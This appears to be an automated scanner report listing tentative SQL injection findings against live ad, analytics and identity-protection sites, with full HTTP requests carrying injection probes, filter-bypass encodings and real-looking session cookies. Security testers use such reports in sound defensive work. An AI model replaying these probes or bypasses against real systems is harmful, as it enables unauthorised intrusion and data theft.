33.62. http://www.actividentity.com/images/favicon.ico

33.63. http://www.asp.net/omniture/analyticsid.aspx

33.64. http://www.bluewin.ch/includes/osn/mdd.php

33.65. https://www.credit.com/favicon.ico

33.66. https://www.creditchecktotal.com/Message.aspx

33.67. http://www.dictof.com/favicon.ico

33.68. http://www.facebook.com/extern/login_status.php

33.69. http://www.freecreditreport.com/images/loan_center_nav_08.gif

33.70. http://www.gfk.com/PHP_Includes/webtv.php

33.71. http://www.google.com/search

33.72. http://www.identitymonitor.citi.com/img/IMN00564/ad3.gif

33.73. http://www.identitymonitor.citi.com/img/IMN00564/bnr1.jpg

33.74. http://www.iis.net/resources/third-party/omniture/analyticsid.aspx

33.75. http://www.lijit.com/wijit

33.76. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg

33.77. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg

33.78. http://www.nextadvisor.com/images/phonepowerlogo.gif

33.79. http://www.nextadvisor.com/includes/javascript.php

33.80. http://www.nextadvisor.com/link.php

33.81. https://www.pcisecuritystandards.org/favicon.ico

33.82. http://www.reputationengineer.com/wp-content/plugins/cforms/lib_ajax.php

33.83. http://www.reputationengineer.com/wp-content/themes/flexibility2/

33.84. http://www.reputationengineer.com/wp-content/themes/flexibility2/images/headerRE.jpg

33.85. https://www.senderscore.org/register/getprovinces.php

33.86. http://www.swisscom.ch/Swisscom.CorporatePortal.Web.PE/Pages/JQueryHandler.aspx

33.87. http://www.swisscom.ch/Swisscom.CorporatePortal.Web.RES/Pages/ServerVariables.aspx

33.88. http://www.truecredit.com/Shortcut_Icon_TU.ico

33.89. https://www.truecredit.com/Shortcut_Icon_TU.ico

33.90. http://www.upsellit.com/custom/trustedID.jsp

33.91. http://www.upsellit.com/upsellitJS4.jsp

34. Content type is not specified



1. SQL injection  next
There are 10 instances of this issue:


1.1. http://ad.doubleclick.net/adj/N4610.Dogtime/B5083466.4 [sz parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/N4610.Dogtime/B5083466.4

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /adj/N4610.Dogtime/B5083466.4;sz=160x600;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=903902%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=21%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=21%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord=0.08206358586677381?%2527 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=c51bf923600009b||t=1303663573|et=730|cs=jppc_u-3

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 24 Apr 2011 16:48:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 53375

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
tocol = "http:";
return siteProtocol;
};

document.write('\n');

function IFrameBuster_59_07() {
};
IFrameBuster_59_07.prototype = new RichMediaCore_59_07;
IFrameBuster_59_07.prototype.displayImageOnFailureBreakout = function(variableName, target, hRef, imgSrc, width, height, altText, creative) {
var expandingUtil = new DARTExpandingUtil_59_07();
expandingUtil.displayImage(variableName, target, hR
...[SNIP]...

Request 2

GET /adj/N4610.Dogtime/B5083466.4;sz=160x600;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=903902%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=21%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=21%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord=0.08206358586677381?%2527%2527 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=c51bf923600009b||t=1303663573|et=730|cs=jppc_u-3

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 24 Apr 2011 16:48:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6520

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Mar 11 17:45:03 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...

1.2. http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://analytic.hotelclub.com
Path:   /b/ss/flairviewhcprod/1/H.17/s84063693960197

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /b/ss/flairviewhcprod%00'/1/H.17/s84063693960197?AQB=1&pccr=true&vidn=26DA09858516231B-400001A4A00530FD&&ndh=1&t=24/3/2011%207%3A9%3A50%200%20300&ce=ISO-8859-1&ns=flairviewtravel&pageName=Homepage&g=http%3A//www.hotelclub.com/&cc=USD&ch=Home%20page&server=www.hotelclub.com&v0=0&events=event7%2Cevent19%2Cevent4&v2=EN&c3=www.hotelclub.com&c4=EN&v5=www.hotelclub.com&v12=Non-member&v21=www.hotelclub.com&v29=USD&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: analytic.hotelclub.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-2165807168.30147192:lv=1303643390479:ss=1303643390479; s_cc=true; s_lp=yes; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DA09858516231B-400001A4A00530FD[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 12:33:17 GMT
Server: Omniture DC/2.0.0
Content-Length: 420
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/flairviewhcprod was not found on this server.</
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/flairviewhcprod%00''/1/H.17/s84063693960197?AQB=1&pccr=true&vidn=26DA09858516231B-400001A4A00530FD&&ndh=1&t=24/3/2011%207%3A9%3A50%200%20300&ce=ISO-8859-1&ns=flairviewtravel&pageName=Homepage&g=http%3A//www.hotelclub.com/&cc=USD&ch=Home%20page&server=www.hotelclub.com&v0=0&events=event7%2Cevent19%2Cevent4&v2=EN&c3=www.hotelclub.com&c4=EN&v5=www.hotelclub.com&v12=Non-member&v21=www.hotelclub.com&v29=USD&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: analytic.hotelclub.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-2165807168.30147192:lv=1303643390479:ss=1303643390479; s_cc=true; s_lp=yes; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DA09858516231B-400001A4A00530FD[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 12:33:17 GMT
Server: Omniture DC/2.0.0
xserver: www432
Content-Length: 0
Content-Type: text/html


1.3. http://googleads.g.doubleclick.net/pagead/ads [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The client parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the client parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /pagead/ads?client=ca-pub-6888065668292638%00'&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658388940&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303658388942&frm=1&adk=2614322350&ga_vid=218077159.1303658389&ga_sid=1303658389&ga_hid=1485847521&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=33895130&fu=4&ifi=1&dtd=6 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keyword}
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:21:47 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 18375

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<span class=adbs id=baw0>See How Cadillac CTS Stacks Up to the E350 Sedan. Compare Now.</span>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-6888065668292638%00''&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658388940&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303658388942&frm=1&adk=2614322350&ga_vid=218077159.1303658389&ga_sid=1303658389&ga_hid=1485847521&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=33895130&fu=4&ifi=1&dtd=6 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keyword}
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:21:48 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1449

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><IFRAME SRC="http://ad.doubleclick.net/adi/N6685.276639.GOOGLEADWORDS/B5169765.3;sz=160x600;site=google_explorer;
...[SNIP]...

1.4. https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1 [WC_GENERIC_ACTIVITYDATA cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/EnrollmentStep1

Issue detail

The WC_GENERIC_ACTIVITYDATA cookie appears to be vulnerable to SQL injection attacks. The payloads 17006380'%20or%201%3d1--%20 and 17006380'%20or%201%3d2--%20 were each submitted in the WC_GENERIC_ACTIVITYDATA cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /webapp/wcs/stores/servlet/EnrollmentStep1 HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]17006380'%20or%201%3d1--%20; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response 1

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:55:56 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: JSESSIONID=0000layarZbbPM9S9YqhLP0MS5P:14glhsrp2; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_AUTHENTICATION_100000002779552=100000002779552%2cZaqeAPeUiJPDXrfOc%2btJk%2bwsOBA%3d; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_100000002779552=100000002779552%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHva%2fzzlX%2bEuJtAn3DpWKN4df6cLICQD2R8plw%2b40R5bf3lwaxFNQXiRFInsQBUaNGByC%0aGE23KSdo1zZQc%2fdYc86o%2fhfLeWmI2b3QEIv7bb522VpFlPbMgOpGTin5qndfbg9zDXy6ryUvZkjP%0a4wU1D87s; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Language: en-US
Content-Length: 1903














<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><head>


   <title>Error Has Occurred</title>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
   <link rel="Shortcut Icon" href="/wcsstore/IdentityGuardStorefrontAssetStore/images/favicon.ico">
   <link href="/wcsstore/IdentityGuardStorefrontAssetStore/css/checkout.css" rel="stylesheet" type="text/css">
   <script src="/wcsstore/IdentityGuardStorefrontAssetStore/javascript/jquery_002.js" type="text/javascript"></script>
   <script src="/wcsstore/IdentityGuardStorefrontAssetStore/javascript/jquery.js" type="text/javascript"></script>
   <script src="/wcsstore/IdentityGuardStorefrontAssetStore/javascript/common.js" type="text/javascript"></script>
</head><div FirebugVersion="1.3.3" style="display: none;" id="_firebugConsole"></div>
<body class="checkout">


<div id="header_wrapper">

   <div id="header">
       
   </div><!--/#header-->

</div><!--/#header_wr
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/EnrollmentStep1 HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]17006380'%20or%201%3d2--%20; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response 2

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:55:56 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000lwFSUkdbtoX55PsdKTV3WFH:14glhsrp2; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 1895














<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><head>


   <title>Error Has Occurred</title>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
   <link rel="Shortcut Icon" href="/wcsstore/IdentityGuardStorefrontAssetStore/images/favicon.ico">
   <link href="/wcsstore/IdentityGuardStorefrontAssetStore/css/checkout.css" rel="stylesheet" type="text/css">
   <script src="/wcsstore/IdentityGuardStorefrontAssetStore/javascript/jquery_002.js" type="text/javascript"></script>
   <script src="/wcsstore/IdentityGuardStorefrontAssetStore/javascript/jquery.js" type="text/javascript"></script>
   <script src="/wcsstore/IdentityGuardStorefrontAssetStore/javascript/common.js" type="text/javascript"></script>
</head><div FirebugVersion="1.3.3" style="display: none;" id="_firebugConsole"></div>
<body class="checkout">


<div id="header_wrapper">

   <div id="header">
       
   </div><!--/#header-->

</div><!--/#header_wrapper-->

<div id="container_wrapper">
   <div id="container">
       <div id="content">

           <div id="error_page">
               <h2 class="step">Error</h2>
               <p><strong>We're sorry, an error has occured.</strong> Please try again later or call Customer Service toll-free at 1-800-452-2541.</p>
               <p class="continue"><a href="http://www.identityguard.com/"><img src="/wcsstore/IdentityGuardStorefrontAssetStore/images/continue.gif" alt="Continue"></a></p>
           </div>

       </div><!--/#content-->
       
       <div id="sidebar">
           &nbsp;
       </div><!--/#sidebar-->
       
       <div class="clear">&nbsp;</div>
       
   </div><!--/#conainer-->
</div><!--/#container_wrapper-->

<div id="footer_wra
...[SNIP]...

1.5. https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/EnrollmentStep1

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /webapp/wcs/stores/servlet/EnrollmentStep1?1'=1 HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:56:47 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: JSESSIONID=0000o6UDhr0G0O4g9uSCeJDbGWy:14glhsrp2; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_AUTHENTICATION_100000002779945=100000002779945%2cYCB0ERVR%2bvSSZwKvSloTAh6LyTs%3d; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_100000002779945=100000002779945%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvblXhE%2f2003J1rpwFczydtwI0qdrGTp11QfwrramJ66OccNkJ8Aa1XeROufjiXhOqKA%0aKccsxqA72eCa8qQZnFUkuclUUsd3etNDGeXyYzzNgYzf0Lzjjx3228eQEIxHsoZF9XZrWkPBVKYl%0aXkve%2fpny; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Language: en-US
Content-Length: 1903


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<title>Error Has Occurred</title>
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/EnrollmentStep1?1''=1 HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
